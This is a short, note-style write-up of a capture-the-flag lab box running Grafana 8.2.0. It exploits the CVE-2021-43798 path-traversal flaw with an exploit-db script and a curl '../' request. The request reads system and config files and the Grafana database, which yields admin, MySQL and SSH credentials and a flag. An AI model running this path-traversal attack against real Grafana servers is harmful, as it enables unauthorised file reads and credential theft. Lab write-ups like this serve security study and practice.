Rustscan
rustscan -a ambassador.htb --ulimit 5000
Website on port 80
Website on port 3000
Grafana version 8.2.0
CVE-2021-43798
https://www.exploit-db.com/exploits/50581
So, I had to download it and run it like this:
python3 50581.py -H http://ambassador.htb:3000Then, select the file I want to read (ex: /etc/passwd).
/etc/grafana/grafana.ini
default admin user, created on startup
;admin_user = admin
default admin password, can be changed before first start of grafana, or in profile settings
admin_password = messageInABottle685427
used for signing
;secret_key = SW2YcwTIb9zpOOhoPsMmI’m in, I’m listing the plugins, maybe I can upload a revers shell on it.
Maybe the interesting to do was searching the files with the last exploit.
I have to find the password.
curl --path-as-is http://ambassador.htb:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db
sqlite3 grafana.db I need to find the creds of grafana to login the mysql database.
SELECT * FROM data_source;
2|1|1|mysql|mysql.yaml|proxy||dontStandSoCloseToMe63221!|grafana|grafana|0|||0|{}|2022-09-01 22:43:03|2022-10-08 20:21:56|0|{}|1|uKewFgM4zPassword = dontStandSoCloseToMe63221!
| developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== |
ssh
618dafc87c795ef87e5f672b4a3902a4
anEnglishManInNewYork027468
